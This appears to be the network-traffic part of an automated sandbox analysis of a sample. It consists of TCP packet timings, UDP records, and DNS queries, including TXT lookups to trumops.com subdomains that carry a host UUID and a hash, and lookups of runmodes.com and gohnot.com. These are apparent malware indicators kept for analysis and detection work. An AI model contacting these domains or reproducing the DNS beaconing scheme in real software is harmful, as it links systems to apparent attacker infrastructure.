                                                                                                                              Nov 11, 2021 20:35:49.153620005 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153640032 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153670073 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153678894 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153719902 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153755903 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153774977 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153795958 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153812885 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153835058 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153908014 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153924942 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153945923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153961897 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153963089 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153971910 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153985977 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154004097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154026031 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154042959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154063940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154077053 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154079914 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154083967 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154098034 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154122114 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154139996 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154160976 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154176950 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154180050 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154205084 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154227972 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154243946 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154267073 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154268980 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154278040 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154284954 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154305935 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154324055 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154341936 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154345989 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154350042 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154365063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154386044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154403925 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154421091 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154426098 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154431105 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154443026 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154464006 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154480934 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154501915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154505014 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154512882 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154519081 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154540062 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154556990 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154576063 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154577971 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154583931 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154594898 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154616117 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154633999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154656887 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154659033 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154666901 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154675007 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154695988 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154712915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154736996 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154736996 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154747009 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154819965 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154836893 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154845953 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154855013 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154870987 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154887915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154905081 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.154947996 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.154957056 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155049086 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155082941 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155100107 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155118942 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155141115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155158043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155179977 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155179977 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155188084 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155199051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155216932 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155221939 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155234098 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155251980 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155270100 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155292988 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155302048 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155309916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155312061 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155322075 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155333042 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155349970 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155368090 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155386925 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155405045 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155409098 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155416012 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155426979 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155441999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155458927 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155482054 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155486107 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155493975 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155500889 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155518055 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155534983 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155555010 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155555010 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155561924 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155572891 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155594110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155611038 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155637980 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155643940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155647039 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155657053 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155673981 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155687094 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155699968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155718088 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155730963 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155730963 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155740023 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155744076 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155762911 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155776024 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155788898 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155806065 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155818939 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.155827045 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155837059 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155925989 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.155934095 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.156156063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.156191111 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.156197071 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.156200886 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.156219006 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.156493902 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165406942 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165427923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165438890 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165456057 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165471077 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165483952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165498018 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165508986 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165512085 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165524960 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165540934 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165549040 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165553093 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165555954 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165555954 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165577888 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165591955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165606976 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165621042 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165622950 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165644884 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165647984 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165657043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165673971 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165688992 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165702105 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165734053 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165750027 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165750980 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165755987 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165767908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165785074 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165801048 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165815115 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165817022 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165833950 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165842056 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165848970 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165868044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165884018 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165885925 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165889978 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.165899992 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165929079 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.165935040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.166024923 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.166044950 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:51.035039902 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:51.036650896 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:36:01.389046907 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.389094114 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.389216900 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.390681028 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.390701056 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.434287071 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.434640884 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.434669018 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.435528040 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.435539961 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.437252998 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.437503099 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.439475060 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.439624071 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.439980030 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.440002918 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.502392054 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.505600929 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.505630970 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.505652905 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.505724907 CET49752443192.168.2.3104.21.34.203
                                                                                                                              Nov 11, 2021 20:36:01.505733013 CET44349752104.21.34.203192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:19.168078899 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:36:19.186630964 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:49.201649904 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:36:49.218282938 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.033441067 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.033483982 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.033596039 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.034787893 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.034818888 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.095156908 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.095371008 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.095408916 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.095961094 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.095974922 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.097665071 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.097744942 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.100572109 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.100724936 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.101360083 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.101401091 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.149414062 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.193440914 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.193542004 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.193620920 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.195194960 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.195225954 CET44349807172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.195242882 CET49807443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:37:02.195254087 CET44349807172.67.139.144192.168.2.3

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 11, 2021 20:35:29.213984966 CET5745953192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:29.235501051 CET53574598.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.262403011 CET5787553192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:29.285563946 CET53578758.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.293365955 CET5415453192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:29.314277887 CET53541548.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.410139084 CET5280653192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:29.435142040 CET53528068.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.539280891 CET6402153192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:29.560755968 CET53640218.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.254117966 CET6078453192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:33.273094893 CET53607848.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.391311884 CET5114353192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:37.410077095 CET53511438.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.704586029 CET5902653192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:48.726865053 CET53590268.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.898014069 CET4957253192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:48.920666933 CET53495728.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:51.045623064 CET6082353192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:35:51.067087889 CET53608238.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:36:01.359951973 CET5213053192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:36:01.379512072 CET53521308.8.8.8192.168.2.3
                                                                                                                              Nov 11, 2021 20:37:02.006071091 CET5710653192.168.2.38.8.8.8
                                                                                                                              Nov 11, 2021 20:37:02.025799036 CET53571068.8.8.8192.168.2.3

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                              Nov 11, 2021 20:35:29.213984966 CET192.168.2.38.8.8.80x8e57Standard query (0)trumops.com16IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.262403011 CET192.168.2.38.8.8.80x89caStandard query (0)logs.trumops.com16IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.293365955 CET192.168.2.38.8.8.80xa6c3Standard query (0)3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com16IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.410139084 CET192.168.2.38.8.8.80x32e4Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.539280891 CET192.168.2.38.8.8.80x66aeStandard query (0)server3.trumops.comA (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:33.254117966 CET192.168.2.38.8.8.80xee9dStandard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:37.391311884 CET192.168.2.38.8.8.80x26e4Standard query (0)server3.trumops.comA (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:48.704586029 CET192.168.2.38.8.8.80x9707Standard query (0)server3.trumops.comA (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:48.898014069 CET192.168.2.38.8.8.80x948cStandard query (0)gohnot.comA (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:51.045623064 CET192.168.2.38.8.8.80x59e8Standard query (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com16IN (0x0001)
                                                                                                                              Nov 11, 2021 20:36:01.359951973 CET192.168.2.38.8.8.80x8ac5Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:37:02.006071091 CET192.168.2.38.8.8.80x71fStandard query (0)server3.trumops.comA (IP address)IN (0x0001)

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                              Nov 11, 2021 20:35:29.235501051 CET8.8.8.8192.168.2.30x8e57No error (0)trumops.comTXT (Text strings)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.285563946 CET8.8.8.8192.168.2.30x89caNo error (0)logs.trumops.comTXT (Text strings)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.314277887 CET8.8.8.8192.168.2.30xa6c3Name error (3)3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.comnonenone16IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.435142040 CET8.8.8.8192.168.2.30x32e4No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.435142040 CET8.8.8.8192.168.2.30x32e4No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.560755968 CET8.8.8.8192.168.2.30x66aeNo error (0)server3.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:29.560755968 CET8.8.8.8192.168.2.30x66aeNo error (0)server3.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:33.273094893 CET8.8.8.8192.168.2.30xee9dNo error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:33.273094893 CET8.8.8.8192.168.2.30xee9dNo error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
